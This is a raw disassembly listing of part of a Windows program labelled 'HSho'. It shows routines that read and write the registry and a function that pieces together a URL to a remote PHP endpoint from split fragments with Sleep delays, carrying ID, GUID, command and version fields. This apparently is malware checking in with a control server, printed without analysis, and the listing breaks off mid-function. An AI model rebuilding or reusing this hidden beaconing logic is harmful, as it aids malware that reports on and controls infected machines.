loc_407C5B: ; CODE XREF: HSho:00407C35�j
; HSho:00407C3E�j
lea ecx, [ebp+8]
push ecx
mov ecx, [ebp-18h]
add ecx, 28h
call dword_41317C
mov ecx, [ebp-18h]
call sub_407A74
mov edx, [ebp-18h]
mov [ebp-14h], edx
mov dword ptr [ebp-4], 0FFFFFFFFh
lea ecx, [ebp+8]
call dword_413168
mov eax, [ebp-14h]
loc_407C8C: ; CODE XREF: HSho:00407C59�j
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset loc_412445
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
mov [ebp-10h], ecx
mov ecx, [ebp-10h]
call sub_408230
mov dword ptr [ebp-4], 0
mov eax, [ebp-10h]
mov dword ptr [eax+28h], 0
mov ecx, [ebp-10h]
mov dword ptr [ecx+2Ch], 0
push offset dword_419C88
mov ecx, [ebp-10h]
add ecx, 8
call dword_413194
mov edx, [ebp-10h]
mov dword ptr [edx], 80000001h
mov eax, [ebp-10h]
mov dword ptr [eax+30h], 0
mov ecx, [ebp-10h]
mov dword ptr [ecx+34h], 0
mov dword ptr [ebp-4], 0FFFFFFFFh
mov eax, [ebp-10h]
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset loc_412476
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 38h
mov [ebp-34h], ecx
mov dword ptr [ebp-4], 0
mov ecx, [ebp-34h]
call sub_408230
mov byte ptr [ebp-4], 1
mov eax, [ebp-34h]
mov dword ptr [eax+28h], 0
mov ecx, [ebp-34h]
mov edx, [ebp+18h]
mov [ecx+2Ch], edx
mov eax, [ebp-34h]
mov ecx, [ebp+1Ch]
mov [eax+34h], ecx
mov edx, [ebp-34h]
mov eax, [ebp+20h]
mov [edx], eax
mov ecx, [ebp-34h]
mov dword ptr [ecx+30h], 0
mov edx, dword_413178
mov eax, [edx]
push eax
push 5Ch
lea ecx, [ebp+8]
call dword_413174
mov [ebp-10h], eax
mov ecx, [ebp-10h]
push ecx
push 0
lea edx, [ebp-20h]
push edx
lea ecx, [ebp+8]
call dword_413170
mov [ebp-38h], eax
mov eax, [ebp-38h]
mov [ebp-3Ch], eax
mov byte ptr [ebp-4], 2
mov ecx, [ebp-3Ch]
push ecx
mov ecx, [ebp-34h]
add ecx, 18h
call dword_41317C
mov byte ptr [ebp-4], 1
lea ecx, [ebp-20h]
call dword_413168
mov edx, dword_413178
mov eax, [edx]
push eax
mov ecx, [ebp-10h]
add ecx, 1
push ecx
lea edx, [ebp-30h]
push edx
lea ecx, [ebp+8]
call dword_413170
mov [ebp-40h], eax
mov eax, [ebp-40h]
mov [ebp-44h], eax
mov byte ptr [ebp-4], 3
mov ecx, [ebp-44h]
push ecx
mov ecx, [ebp-34h]
add ecx, 8
call dword_41317C
mov byte ptr [ebp-4], 1
lea ecx, [ebp-30h]
call dword_413168
mov ecx, [ebp-34h]
call sub_407E59
mov dword ptr [ebp-4], 0FFFFFFFFh
lea ecx, [ebp+8]
call dword_413168
mov eax, [ebp-34h]
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn 1Ch
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
mov [ebp-4], ecx
mov ecx, [ebp-4]
call sub_408290
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407E59 proc near ; CODE XREF: HSho:00407E1E�p
; HSho:00407FAE�p
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_C], ecx
mov eax, [ebp+var_C]
add eax, 4
push eax
push 20019h
push 0
mov ecx, [ebp+var_C]
add ecx, 18h
call dword_413188
push eax
mov ecx, [ebp+var_C]
mov edx, [ecx]
push edx
call dword_413004 ; RegOpenKeyExA
test eax, eax
jnz short loc_407EF7
mov [ebp+var_4], 4
lea eax, [ebp+var_4]
push eax
mov ecx, [ebp+var_C]
add ecx, 28h
push ecx
lea edx, [ebp+var_8]
push edx
push 0
mov ecx, [ebp+var_C]
add ecx, 8
call dword_413188
push eax
mov eax, [ebp+var_C]
mov ecx, [eax+4]
push ecx
call dword_413010 ; RegQueryValueExA
test eax, eax
jnz short loc_407EE2
mov edx, [ebp+var_C]
mov dword ptr [edx+30h], 1
mov eax, [ebp+var_C]
mov ecx, [eax+4]
push ecx
call dword_413000 ; RegCloseKey
mov edx, [ebp+var_C]
mov eax, [edx+28h]
jmp short loc_407EFD
; ---------------------------------------------------------------------------
loc_407EE2: ; CODE XREF: sub_407E59+68�j
mov eax, [ebp+var_C]
mov ecx, [eax+4]
push ecx
call dword_413000 ; RegCloseKey
mov edx, [ebp+var_C]
mov eax, [edx+2Ch]
jmp short loc_407EFD
; ---------------------------------------------------------------------------
loc_407EF7: ; CODE XREF: sub_407E59+32�j
mov eax, [ebp+var_C]
mov eax, [eax+2Ch]
loc_407EFD: ; CODE XREF: sub_407E59+87�j
; sub_407E59+9C�j
mov esp, ebp
pop ebp
retn
sub_407E59 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 8
mov [ebp-8], ecx
lea eax, [ebp-4]
push eax
mov ecx, [ebp-8]
add ecx, 4
push ecx
push 0
push 20006h
push 0
push offset dword_419C8C
push 0
mov ecx, [ebp-8]
add ecx, 18h
call dword_413188
push eax
mov edx, [ebp-8]
mov eax, [edx]
push eax
call dword_41300C ; RegCreateKeyExA
test eax, eax
jz short loc_407F44
jmp short loc_407F86
; ---------------------------------------------------------------------------
loc_407F44: ; CODE XREF: HSho:00407F40�j
push 4
mov ecx, [ebp-8]
add ecx, 28h
push ecx
push 4
push 0
mov ecx, [ebp-8]
add ecx, 8
call dword_413188
push eax
mov edx, [ebp-8]
mov eax, [edx+4]
push eax
call dword_413008 ; RegSetValueExA
test eax, eax
jnz short loc_407F79
mov ecx, [ebp-8]
mov dword ptr [ecx+30h], 1
loc_407F79: ; CODE XREF: HSho:00407F6D�j
mov edx, [ebp-8]
mov eax, [edx+4]
push eax
call dword_413000 ; RegCloseKey
loc_407F86: ; CODE XREF: HSho:00407F42�j
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
mov [ebp-4], ecx
mov eax, [ebp-4]
cmp dword ptr [eax+30h], 0
jz short loc_407FAB
mov ecx, [ebp-4]
cmp dword ptr [ecx+34h], 0
jnz short loc_407FAB
mov edx, [ebp-4]
mov eax, [edx+28h]
jmp short loc_407FB3
; ---------------------------------------------------------------------------
loc_407FAB: ; CODE XREF: HSho:00407F98�j
; HSho:00407FA1�j
mov ecx, [ebp-4]
call sub_407E59
loc_407FB3: ; CODE XREF: HSho:00407FA9�j
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407FC0 proc near ; CODE XREF: HSho:0040630F�p
; sub_406374+29�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_407FC0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
mov [ebp+var_10], ecx
mov ecx, [ebp+var_10]
add ecx, 8
call sub_41151E
mov [ebp+var_4], 0
mov ecx, [ebp+var_10]
add ecx, 0Ch
call sub_41151E
mov [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_10]
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
sub_407FC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408020 proc near ; CODE XREF: sub_4064C6+A�p
; sub_4068AF+47�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_408020
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
mov [ebp+var_10], ecx
mov [ebp+var_4], 0
mov ecx, [ebp+var_10]
add ecx, 0Ch
call sub_411512
mov [ebp+var_4], 0FFFFFFFFh
mov ecx, [ebp+var_10]
add ecx, 8
call sub_411512
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
sub_408020 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408070 proc near ; CODE XREF: sub_406374+BF�p
; sub_40671B+E9�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
call sub_408090
mov eax, [eax+4]
mov esp, ebp
pop ebp
retn
sub_408070 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408090 proc near ; CODE XREF: sub_408070+A�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov eax, [eax]
sub eax, 0Ch
mov esp, ebp
pop ebp
retn
sub_408090 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4080B0 proc near ; CODE XREF: sub_406BA8+30�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov ecx, [ebp+arg_4]
call sub_4026A0
push eax
mov ecx, [ebp+arg_0]
call sub_4080D0
neg eax
sbb eax, eax
inc eax
pop ebp
retn 8
sub_4080B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4080D0 proc near ; CODE XREF: sub_4080B0+F�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_4]
mov edx, [ecx]
push edx
call sub_4080F0
add esp, 8
mov esp, ebp
pop ebp
retn 4
sub_4080D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4080F0 proc near ; CODE XREF: sub_4080D0+11�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call dword_4131EC ; _mbscmp
add esp, 8
pop ebp
retn
sub_4080F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408110 proc near ; CODE XREF: HSho:00406C96�p
; HSho:00406CC2�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov [eax], ecx
mov edx, [ebp+var_4]
mov eax, [ebp+arg_4]
mov [edx+4], eax
mov ecx, [ebp+var_4]
mov edx, [ebp+arg_8]
mov [ecx+8], edx
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_C]
mov [eax+0Ch], ecx
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 10h
sub_408110 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408150 proc near ; CODE XREF: sub_406EDD+AA�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_4]
push ecx
call dword_413290 ; CopyRect
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 4
sub_408150 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408170 proc near ; CODE XREF: HSho:00406C7B�p
; HSho:00406C86�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_408170 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408180 proc near ; CODE XREF: HSho:0040716A�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_4]
push ecx
call dword_413294 ; EqualRect
mov esp, ebp
pop ebp
retn 4
sub_408180 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4081A0 proc near ; CODE XREF: HSho:004071F9�p
; HSho:00407213�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov [eax], ecx
mov edx, [ebp+var_4]
mov eax, [ebp+arg_4]
mov [edx+4], eax
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 8
sub_4081A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4081D0 proc near ; CODE XREF: sub_407400+B0�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov [eax], ecx
mov edx, [ebp+arg_4]
mov [eax+4], edx
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 8
sub_4081D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4081F0 proc near ; CODE XREF: HSho:0040764E�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov ecx, [eax]
cmp ecx, [ebp+arg_0]
jnz short loc_408217
mov edx, [ebp+var_4]
mov eax, [edx+4]
cmp eax, [ebp+arg_4]
jnz short loc_408217
mov [ebp+var_8], 1
jmp short loc_40821E
; ---------------------------------------------------------------------------
loc_408217: ; CODE XREF: sub_4081F0+11�j
; sub_4081F0+1C�j
mov [ebp+var_8], 0
loc_40821E: ; CODE XREF: sub_4081F0+25�j
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn 8
sub_4081F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408230 proc near ; CODE XREF: HSho:004076A6�p
; HSho:0040776A�p ...
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_408230
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
mov [ebp+var_18], ecx
lea eax, [ebp+var_10]
push eax
mov ecx, [ebp+var_18]
add ecx, 8
call dword_41316C
mov [ebp+var_4], 0
lea ecx, [ebp+var_14]
push ecx
mov ecx, [ebp+var_18]
add ecx, 18h
call dword_41316C
mov [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_18]
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
sub_408230 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408290 proc near ; CODE XREF: HSho:00407900�p
; HSho:00407E50�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_408290
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
mov [ebp+var_10], ecx
mov [ebp+var_4], 0
mov ecx, [ebp+var_10]
add ecx, 18h
call dword_413168
mov [ebp+var_4], 0FFFFFFFFh
mov ecx, [ebp+var_10]
add ecx, 8
call dword_413168
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
sub_408290 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4082E0 proc near ; DATA XREF: HSho:00417004�o
push ebp
mov ebp, esp
call sub_4082EF
call sub_4082FE
pop ebp
retn
sub_4082E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4082EF proc near ; CODE XREF: sub_4082E0+3�p
push ebp
mov ebp, esp
mov ecx, offset dword_419C90
call sub_4095C0
pop ebp
retn
sub_4082EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4082FE proc near ; CODE XREF: sub_4082E0+8�p
push ebp
mov ebp, esp
push offset sub_408310
call sub_411672
add esp, 4
pop ebp
retn
sub_4082FE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408310 proc near ; DATA XREF: sub_4082FE+3�o
push ebp
mov ebp, esp
mov ecx, offset dword_419C90
call sub_409540
pop ebp
retn
sub_408310 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40831F proc near ; CODE XREF: sub_4091F5+F9�p
var_28DC = dword ptr -28DCh
var_28D8 = dword ptr -28D8h
var_28D4 = dword ptr -28D4h
var_28D0 = dword ptr -28D0h
var_28CA = word ptr -28CAh
var_28C8 = dword ptr -28C8h
var_28C4 = dword ptr -28C4h
var_28C0 = dword ptr -28C0h
var_28BC = dword ptr -28BCh
var_28B8 = dword ptr -28B8h
var_28B4 = dword ptr -28B4h
var_28B0 = dword ptr -28B0h
var_28AC = dword ptr -28ACh
var_28A8 = dword ptr -28A8h
var_28A4 = dword ptr -28A4h
var_28A0 = dword ptr -28A0h
var_289C = dword ptr -289Ch
var_2898 = dword ptr -2898h
var_2894 = dword ptr -2894h
var_2890 = dword ptr -2890h
var_288C = dword ptr -288Ch
var_2888 = dword ptr -2888h
var_2884 = dword ptr -2884h
var_2880 = dword ptr -2880h
var_287C = dword ptr -287Ch
var_2878 = dword ptr -2878h
var_2874 = dword ptr -2874h
var_2870 = dword ptr -2870h
var_286C = dword ptr -286Ch
var_2868 = dword ptr -2868h
var_2864 = dword ptr -2864h
var_2860 = dword ptr -2860h
var_285C = dword ptr -285Ch
var_2858 = dword ptr -2858h
var_2854 = dword ptr -2854h
var_2850 = dword ptr -2850h
var_284C = dword ptr -284Ch
var_2848 = dword ptr -2848h
var_2844 = dword ptr -2844h
var_2840 = dword ptr -2840h
var_283C = dword ptr -283Ch
var_2838 = dword ptr -2838h
var_2834 = dword ptr -2834h
var_2830 = dword ptr -2830h
var_282C = dword ptr -282Ch
var_2828 = dword ptr -2828h
var_2824 = dword ptr -2824h
var_2820 = dword ptr -2820h
var_281C = dword ptr -281Ch
var_2818 = byte ptr -2818h
var_2814 = dword ptr -2814h
var_2810 = dword ptr -2810h
var_280C = dword ptr -280Ch
var_2808 = byte ptr -2808h
var_2804 = dword ptr -2804h
var_2800 = byte ptr -2800h
var_27FC = byte ptr -27FCh
var_27F8 = byte ptr -27F8h
var_27F4 = byte ptr -27F4h
var_27F0 = byte ptr -27F0h
var_27EC = byte ptr -27ECh
var_27E8 = byte ptr -27E8h
var_27E4 = byte ptr -27E4h
var_27E0 = byte ptr -27E0h
var_27DC = byte ptr -27DCh
var_27D8 = byte ptr -27D8h
var_27D4 = byte ptr -27D4h
var_27D0 = byte ptr -27D0h
var_27CC = byte ptr -27CCh
var_27C8 = byte ptr -27C8h
var_27C4 = dword ptr -27C4h
var_27C0 = byte ptr -27C0h
var_27BC = byte ptr -27BCh
var_27B8 = dword ptr -27B8h
var_27B4 = dword ptr -27B4h
var_27B0 = byte ptr -27B0h
var_27AC = byte ptr -27ACh
var_279C = byte ptr -279Ch
var_1F9C = byte ptr -1F9Ch
var_1F98 = dword ptr -1F98h
var_1F94 = dword ptr -1F94h
var_1F90 = byte ptr -1F90h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = byte ptr -48h
var_38 = byte ptr -38h
var_34 = byte ptr -34h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_40831F
mov eax, large fs:0
push eax
mov large fs:0, esp
mov eax, 28D0h
call sub_4115D0
mov [ebp+var_282C], ecx
mov [ebp+var_1F98], 0
mov [ebp+var_38], 1
lea ecx, [ebp+var_1C]
call sub_409CB0
mov [ebp+var_4], 0
lea ecx, [ebp+var_18]
call sub_41151E
mov byte ptr [ebp+var_4], 1
lea ecx, [ebp+var_24]
call sub_41151E
mov byte ptr [ebp+var_4], 2
mov [ebp+var_1F94], 0
lea ecx, [ebp+var_14]
call sub_41151E
mov byte ptr [ebp+var_4], 3
mov eax, [ebp+var_282C]
mov ecx, [eax]
push ecx
push offset aD_0 ; "%d"
lea edx, [ebp+var_48]
push edx
call dword_4131E4 ; sprintf
add esp, 0Ch
lea eax, [ebp+var_48]
push eax
push offset asc_41750C ; "&x="
lea ecx, [ebp+var_27BC]
push ecx
mov ecx, [ebp+var_282C]
add ecx, 8
call sub_405693
mov [ebp+var_2830], eax
mov edx, [ebp+var_2830]
mov [ebp+var_2834], edx
mov byte ptr [ebp+var_4], 4
mov eax, [ebp+var_2834]
push eax
push offset aI_0 ; "&i="
lea ecx, [ebp+var_27C0]
push ecx
mov ecx, [ebp+var_282C]
add ecx, 8
call sub_40558C
mov [ebp+var_2838], eax
mov edx, [ebp+var_2838]
mov [ebp+var_283C], edx
mov byte ptr [ebp+var_4], 5
mov eax, [ebp+var_283C]
push eax
push offset aP_1 ; "&p="
push offset dword_41BCD0
push offset aCmd_0 ; "&cmd="
mov ecx, [ebp+var_282C]
add ecx, 10h
push ecx
mov edx, esp
mov [ebp+var_27C4], esp
push ecx
mov ecx, edx
call sub_411506
mov [ebp+var_2840], eax
lea eax, [ebp+var_27C8]
push eax
mov ecx, [ebp+var_282C]
add ecx, 8
call sub_402FAF
mov [ebp+var_2844], eax
mov ecx, [ebp+var_2844]
mov [ebp+var_2848], ecx
mov byte ptr [ebp+var_4], 6
mov edx, [ebp+var_2848]
push edx
push offset aGuid ; "&GUID="
lea eax, [ebp+var_27CC]
push eax
mov ecx, [ebp+var_282C]
add ecx, 8
call sub_405327
mov [ebp+var_284C], eax
mov ecx, [ebp+var_284C]
mov [ebp+var_2850], ecx
mov byte ptr [ebp+var_4], 7
mov edx, [ebp+var_2850]
push edx
push offset aConfigversion ; "&configversion="
mov eax, [ebp+var_282C]
add eax, 1Ch
push eax
push offset aVersion ; "&version="
lea ecx, [ebp+var_27D0]
push ecx
call sub_41154E
mov [ebp+var_2854], eax
mov edx, [ebp+var_2854]
mov [ebp+var_2858], edx
mov byte ptr [ebp+var_4], 8
mov eax, [ebp+var_2858]
push eax
lea ecx, [ebp+var_27D4]
push ecx
call sub_41152A
mov [ebp+var_285C], eax
mov edx, [ebp+var_285C]
mov [ebp+var_2860], edx
mov byte ptr [ebp+var_4], 9
mov eax, [ebp+var_2860]
push eax
lea ecx, [ebp+var_27D8]
push ecx
call sub_411524
mov [ebp+var_2864], eax
mov edx, [ebp+var_2864]
mov [ebp+var_2868], edx
mov byte ptr [ebp+var_4], 0Ah
mov eax, [ebp+var_2868]
push eax
lea ecx, [ebp+var_27DC]
push ecx
call sub_41152A
mov [ebp+var_286C], eax
mov edx, [ebp+var_286C]
mov [ebp+var_2870], edx
mov byte ptr [ebp+var_4], 0Bh
mov eax, [ebp+var_2870]
push eax
lea ecx, [ebp+var_27E0]
push ecx
call sub_411524
mov [ebp+var_2874], eax
mov edx, [ebp+var_2874]
mov [ebp+var_2878], edx
mov byte ptr [ebp+var_4], 0Ch
mov eax, [ebp+var_2878]
push eax
lea ecx, [ebp+var_27E4]
push ecx
call sub_41152A
mov [ebp+var_287C], eax
mov edx, [ebp+var_287C]
mov [ebp+var_2880], edx
mov byte ptr [ebp+var_4], 0Dh
mov eax, [ebp+var_2880]
push eax
lea ecx, [ebp+var_27E8]
push ecx
call sub_411524
mov [ebp+var_2884], eax
mov edx, [ebp+var_2884]
mov [ebp+var_2888], edx
mov byte ptr [ebp+var_4], 0Eh
mov eax, [ebp+var_2888]
push eax
lea ecx, [ebp+var_27EC]
push ecx
call sub_41152A
mov [ebp+var_288C], eax
mov edx, [ebp+var_288C]
mov [ebp+var_2890], edx
mov byte ptr [ebp+var_4], 0Fh
mov eax, [ebp+var_2890]
push eax
lea ecx, [ebp+var_27F0]
push ecx
call sub_411524
mov [ebp+var_2894], eax
mov edx, [ebp+var_2894]
mov [ebp+var_2898], edx
mov byte ptr [ebp+var_4], 10h
mov eax, [ebp+var_2898]
push eax
lea ecx, [ebp+var_27F4]
push ecx
call sub_41152A
mov [ebp+var_289C], eax
mov edx, [ebp+var_289C]
mov [ebp+var_28A0], edx
mov byte ptr [ebp+var_4], 11h
mov eax, [ebp+var_28A0]
push eax
lea ecx, [ebp+var_27F8]
push ecx
call sub_411524
mov [ebp+var_28A4], eax
mov edx, [ebp+var_28A4]
mov [ebp+var_28A8], edx
mov byte ptr [ebp+var_4], 12h
mov eax, [ebp+var_28A8]
push eax
lea ecx, [ebp+var_27FC]
push ecx
call sub_41152A
mov [ebp+var_28AC], eax
mov edx, [ebp+var_28AC]
mov [ebp+var_28B0], edx
mov byte ptr [ebp+var_4], 13h
mov eax, [ebp+var_28B0]
push eax
lea ecx, [ebp+var_2800]
push ecx
call sub_41152A
mov [ebp+var_28B4], eax
mov edx, [ebp+var_28B4]
mov [ebp+var_28B8], edx
mov byte ptr [ebp+var_4], 14h
mov eax, [ebp+var_28B8]
push eax
lea ecx, [ebp+var_14]
call sub_411518
mov byte ptr [ebp+var_4], 13h
lea ecx, [ebp+var_2800]
call sub_411512
mov byte ptr [ebp+var_4], 12h
lea ecx, [ebp+var_27FC]
call sub_411512
mov byte ptr [ebp+var_4], 11h
lea ecx, [ebp+var_27F8]
call sub_411512
mov byte ptr [ebp+var_4], 10h
lea ecx, [ebp+var_27F4]
call sub_411512
mov byte ptr [ebp+var_4], 0Fh
lea ecx, [ebp+var_27F0]
call sub_411512
mov byte ptr [ebp+var_4], 0Eh
lea ecx, [ebp+var_27EC]
call sub_411512
mov byte ptr [ebp+var_4], 0Dh
lea ecx, [ebp+var_27E8]
call sub_411512
mov byte ptr [ebp+var_4], 0Ch
lea ecx, [ebp+var_27E4]
call sub_411512
mov byte ptr [ebp+var_4], 0Bh
lea ecx, [ebp+var_27E0]
call sub_411512
mov byte ptr [ebp+var_4], 0Ah
lea ecx, [ebp+var_27DC]
call sub_411512
mov byte ptr [ebp+var_4], 9
lea ecx, [ebp+var_27D8]
call sub_411512
mov byte ptr [ebp+var_4], 8
lea ecx, [ebp+var_27D4]
call sub_411512
mov byte ptr [ebp+var_4], 7
lea ecx, [ebp+var_27D0]
call sub_411512
mov byte ptr [ebp+var_4], 6
lea ecx, [ebp+var_27CC]
call sub_411512
mov byte ptr [ebp+var_4], 5
lea ecx, [ebp+var_27C8]
call sub_411512
mov byte ptr [ebp+var_4], 4
lea ecx, [ebp+var_27C0]
call sub_411512
mov byte ptr [ebp+var_4], 3
lea ecx, [ebp+var_27BC]
call sub_411512
mov [ebp+var_20], 0
push offset aHtt ; "htt"
lea ecx, [ebp+var_279C]
push ecx
call dword_4130CC ; lstrcpyA
push 22h
call dword_4130E0 ; Sleep
push offset aP ; "p://"
lea edx, [ebp+var_279C]
push edx
call dword_413074 ; lstrcatA
push 1Ch
call dword_4130E0 ; Sleep
push offset aWr_mc ; "wr.mc"
lea eax, [ebp+var_279C]
push eax
call dword_413074 ; lstrcatA
push 21h
call dword_4130E0 ; Sleep
push offset aBoo_co ; "boo.co"
lea ecx, [ebp+var_279C]
push ecx
call dword_413074 ; lstrcatA
push 1Eh
call dword_4130E0 ; Sleep
push offset aMReta ; "m/reta"
lea edx, [ebp+var_279C]
push edx
call dword_413074 ; lstrcatA
push 1Fh
call dword_4130E0 ; Sleep
push offset aDpu_php? ; "dpu.php?"
lea eax, [ebp+var_279C]
push eax
call dword_413074 ; lstrcatA
lea ecx, [ebp+var_14]
call sub_4026A0
push eax
lea ecx, [ebp+var_279C]
push ecx
call dword_413074 ; lstrcatA
lea edx, [ebp+var_20]
push edx
lea eax, [ebp+var_279C]
push eax
mov ecx, [ebp+var_282C]
add ecx, 8
call sub_402F1E
mov [ebp+var_10], eax
cmp [ebp+var_10], 64h
jnb short loc_408902
mov [ebp+var_2804], 0
mov byte ptr [ebp+var_4], 2
lea ecx, [ebp+var_14]
call sub_411512
mov byte ptr [ebp+var_4], 1
lea ecx, [ebp+var_24]
call sub_411512
mov byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_18]
call sub_411512
mov [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+var_1C]
call sub_4041A5
mov eax, [ebp+var_2804]
jmp loc_408D91
; ---------------------------------------------------------------------------
loc_408902: ; CODE XREF: sub_40831F+599�j
mov ecx, [ebp+var_10]
add ecx, 1
push ecx
mov edx, [ebp+var_20]
push edx
lea eax, [ebp+var_1F90]
push eax
